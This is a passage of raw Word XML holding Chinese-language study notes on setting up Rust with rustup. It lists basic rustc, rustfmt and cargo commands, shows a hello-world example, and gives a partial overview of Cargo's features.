    <w:p w14:paraId="1FD6E40B" w14:textId="77777777" w:rsidR="00504C5E" w:rsidRDefault="00504C5E" w:rsidP="005C1D25"/>
    <w:p w14:paraId="56164468" w14:textId="77777777" w:rsidR="00504C5E" w:rsidRDefault="00504C5E" w:rsidP="005C1D25"/>
    <w:p w14:paraId="0848562A" w14:textId="77777777" w:rsidR="00504C5E" w:rsidRDefault="00504C5E" w:rsidP="005C1D25"/>
    <w:p w14:paraId="2F473FBE" w14:textId="765A8995" w:rsidR="00146663" w:rsidRDefault="00146663" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rustup-init.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Visual Studio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AA4350" w14:textId="76668FC5" w:rsidR="00146663" w:rsidRDefault="00146663" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rustc -V </w:t>
      </w:r>
      <w:r w:rsidR="00532AF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00532AF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cargo -V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到正确输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8C62A" w14:textId="77777777" w:rsidR="00146663" w:rsidRDefault="00146663" w:rsidP="005C1D25"/>
    <w:p w14:paraId="6ADC1A2A" w14:textId="484B2756" w:rsidR="009B29FF" w:rsidRDefault="009B29FF" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我此处都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> V1.78.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520CC86F" w14:textId="77777777" w:rsidR="009B29FF" w:rsidRDefault="009B29FF" w:rsidP="005C1D25"/>
    <w:p w14:paraId="3D452726" w14:textId="77777777" w:rsidR="004D797F" w:rsidRDefault="004D797F" w:rsidP="005C1D25"/>
    <w:p w14:paraId="718CA147" w14:textId="7BCEFA90" w:rsidR="004D797F" w:rsidRDefault="004D797F" w:rsidP="004D797F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C68114A" w14:textId="402D8309" w:rsidR="004D797F" w:rsidRDefault="004D797F" w:rsidP="004D797F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151B6D16" w14:textId="3954672D" w:rsidR="004D797F" w:rsidRPr="004D797F" w:rsidRDefault="004D797F" w:rsidP="004D797F">
      <w:r w:rsidRPr="00937A69">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rustup update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3A5FDF" w14:textId="77777777" w:rsidR="004D797F" w:rsidRDefault="004D797F" w:rsidP="005C1D25"/>
    <w:p w14:paraId="651E37A9" w14:textId="1A64B4B9" w:rsidR="004D797F" w:rsidRDefault="004D797F" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608025C0" w14:textId="39E9F2DD" w:rsidR="004D797F" w:rsidRDefault="004D797F" w:rsidP="005C1D25">
      <w:r w:rsidRPr="00937A69">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rustup self uninstall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2359D08E" w14:textId="77777777" w:rsidR="004D797F" w:rsidRDefault="004D797F" w:rsidP="005C1D25"/>
    <w:p w14:paraId="421112BC" w14:textId="2F99C377" w:rsidR="004D797F" w:rsidRDefault="009E21F2" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认有本地离线的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Doc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档，可以使用浏览器看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E42DB73" w14:textId="4FA51BAD" w:rsidR="009E21F2" w:rsidRDefault="009E21F2" w:rsidP="005C1D25">
      <w:r w:rsidRPr="00937A69">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rustup doc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BEA8C" w14:textId="77777777" w:rsidR="009E21F2" w:rsidRDefault="009E21F2" w:rsidP="005C1D25"/>
    <w:p w14:paraId="442947E5" w14:textId="1409A46D" w:rsidR="000105C4" w:rsidRDefault="000105C4" w:rsidP="005449B3">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
      <w:r w:rsidR="005449B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单个文件（不需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cargo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C23394B" w14:textId="0B764FA4" w:rsidR="000105C4" w:rsidRDefault="000105C4" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main.rs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1FA3E6" w14:textId="2FD1EBDA" w:rsidR="000105C4" w:rsidRDefault="000105C4" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17960356" w14:textId="77777777" w:rsidR="000105C4" w:rsidRPr="000105C4" w:rsidRDefault="000105C4" w:rsidP="000105C4">
      <w:r w:rsidRPr="000105C4">
        <w:t>fn main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710ACADD" w14:textId="77777777" w:rsidR="000105C4" w:rsidRPr="000105C4" w:rsidRDefault="000105C4" w:rsidP="000105C4">
      <w:r w:rsidRPr="000105C4">
        <w:t xml:space="preserve">    println!("Hello, world!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EBA9E1" w14:textId="46156B35" w:rsidR="000105C4" w:rsidRDefault="000105C4" w:rsidP="000105C4">
      <w:r w:rsidRPr="000105C4">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1960B476" w14:textId="2DDD69D9" w:rsidR="000105C4" w:rsidRDefault="000105C4" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FBDBDA" w14:textId="5F65B9C2" w:rsidR="000105C4" w:rsidRDefault="000105C4" w:rsidP="005C1D25">
      <w:r w:rsidRPr="000105C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rustc main.rs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C19541D" w14:textId="318CDB9E" w:rsidR="000105C4" w:rsidRDefault="000105C4" w:rsidP="005C1D25">
      <w:r w:rsidRPr="000105C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>./main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316D3BD8" w14:textId="77777777" w:rsidR="000105C4" w:rsidRDefault="000105C4" w:rsidP="005C1D25"/>
    <w:p w14:paraId="22FC5EB7" w14:textId="2CA69B55" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005449B3">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FE8D42" w14:textId="0BEB5B3F" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25">
      <w:r w:rsidRPr="005449B3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rustfmt</w:t>
      </w:r>
      <w:r w:rsidRPr="005449B3">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205514DA" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="2E63212F" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="1D967526" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="4AFE7383" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="511D902B" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="423BCA5E" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="4CC8BCC2" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="714D9DE8" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="7825E2E5" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="6B780432" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="6FE3A658" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="1B33390C" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="490AEDC0" w14:textId="77777777" w:rsidR="005449B3" w:rsidRDefault="005449B3" w:rsidP="005C1D25"/>
    <w:p w14:paraId="7CD67BD3" w14:textId="2BAF490C" w:rsidR="005C3BE8" w:rsidRDefault="005C3BE8" w:rsidP="005C3BE8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cargo</w:t>
      </w:r>
      <w:r w:rsidR="000105C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：包管理器、构建器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FECB437" w14:textId="77777777" w:rsidR="00337C5D" w:rsidRDefault="00337C5D" w:rsidP="00337C5D"/>
    <w:p w14:paraId="03082D0B" w14:textId="0BD6D8AA" w:rsidR="00337C5D" w:rsidRPr="009D0E67" w:rsidRDefault="00337C5D" w:rsidP="00337C5D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0E67">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cargo new greeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48354F9F" w14:textId="77777777" w:rsidR="009D0E67" w:rsidRPr="009D0E67" w:rsidRDefault="009D0E67" w:rsidP="009D0E67">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0E67">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">cd ./greeting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403C66F8" w14:textId="77777777" w:rsidR="009D0E67" w:rsidRPr="009D0E67" w:rsidRDefault="009D0E67" w:rsidP="009D0E67">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0E67">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">cargo build </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A231A1" w14:textId="68471A9F" w:rsidR="009D0E67" w:rsidRPr="009D0E67" w:rsidRDefault="009D0E67" w:rsidP="009D0E67">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0E67">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cargo run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260890D2" w14:textId="77777777" w:rsidR="009D0E67" w:rsidRPr="00337C5D" w:rsidRDefault="009D0E67" w:rsidP="00337C5D"/>
    <w:p w14:paraId="2728B3ED" w14:textId="77777777" w:rsidR="005C3BE8" w:rsidRDefault="005C3BE8" w:rsidP="005C3BE8">
      <w:r>
        <w:t xml:space="preserve">build your project with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C3BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cargo build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6EDD10" w14:textId="78D60BA5" w:rsidR="001653F8" w:rsidRDefault="005C3BE8" w:rsidP="005C3BE8">
      <w:r>
        <w:t>run your project</w:t>
      </w:r>
      <w:r w:rsidR="00EB5310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB5310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00EB5310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Also produce an executable file if modified</w:t>
      </w:r>
      <w:r w:rsidR="00EB5310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C3BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cargo run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7B9613" w14:textId="77777777" w:rsidR="005C3BE8" w:rsidRDefault="005C3BE8" w:rsidP="005C3BE8">
      <w:r>
        <w:t xml:space="preserve">test your project with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C3BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cargo test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433954A2" w14:textId="583288B9" w:rsidR="005C3BE8" w:rsidRDefault="005C3BE8" w:rsidP="005C3BE8">
      <w:r>
        <w:t xml:space="preserve">build documentation for your project with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C3BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cargo doc</w:t>
      </w:r>
      <w:r w:rsidR="00000AD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00000AD9">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00000AD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ope</w:t>
      </w:r>
      <w:r w:rsidR="00000AD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007055AC" w14:textId="09709CE7" w:rsidR="005C1D25" w:rsidRDefault="005C3BE8" w:rsidP="005C3BE8">
      <w:r>
        <w:t xml:space="preserve">publish a library to crates.io with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C3BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cargo publish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD3C68B" w14:textId="2C016B49" w:rsidR="005C1D25" w:rsidRDefault="00EB5310" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if the syntax is correct without build and run: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cargo check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9962FE" w14:textId="77777777" w:rsidR="009A06B0" w:rsidRDefault="009A06B0" w:rsidP="005C1D25"/>
    <w:p w14:paraId="088F61A1" w14:textId="5C6A5F0B" w:rsidR="009A06B0" w:rsidRDefault="009A06B0" w:rsidP="005C1D25">
      <w:r w:rsidRPr="009A06B0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cargo doc --open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6281B4FA" w14:textId="0D217300" w:rsidR="009A06B0" w:rsidRPr="000C57E3" w:rsidRDefault="000C57E3" w:rsidP="005C1D25">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>查看文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C07320C" w14:textId="1CFEBABE" w:rsidR="009A06B0" w:rsidRDefault="002E003C" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="734EBCB3" wp14:editId="718CF67D">
            <wp:extent cx="5274310" cy="2873375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32653421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34210" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2873375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD78EFD" w14:textId="5E59393F" w:rsidR="009A06B0" w:rsidRDefault="002E003C" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会递归把使用到的函数文档整理到本地的离线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4F1505" w14:textId="5ECEF65D" w:rsidR="002E003C" w:rsidRDefault="002E003C" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44CE4692" wp14:editId="3997E670">
            <wp:extent cx="5274310" cy="3482340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1480932600"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32600" name="图片 1" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3482340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="160FD6E3" w14:textId="3CB2269B" w:rsidR="009A06B0" w:rsidRDefault="002B4B0C" w:rsidP="005C1D25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="197FD929" wp14:editId="6E8106DE">
            <wp:extent cx="5274310" cy="3140075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="504807369"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07369" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3140075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1813CC7A" w14:textId="77777777" w:rsidR="009A06B0" w:rsidRDefault="009A06B0" w:rsidP="005C1D25"/>
    <w:p w14:paraId="0DD8472F" w14:textId="1627CEAB" w:rsidR="005C1D25" w:rsidRDefault="005C3BE8" w:rsidP="005C1D25">
      <w:r w:rsidRPr="005C3BE8">
        <w:t>cargo --version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F3C342" w14:textId="69D1A7BF" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r w:rsidRPr="005751CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r w:rsidRPr="005751CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>主要特性和功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A6B2C6" w14:textId="2F9B09BF" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依赖管理：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cargo.toml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件管理项目的依赖，这个文件列出了项目所需的所有外部库以及它们的版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A2DC54" w14:textId="020C5EBC" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建系统：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rust </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rustc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来构建项目，它会自动处理依赖的编译和链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B4A6E" w14:textId="2131796F" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包注册表：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> crates.io </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rust </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>社区的包注册表交互，允许开发者搜索、添加和管理第三方库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592A22D" w14:textId="39F90494" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
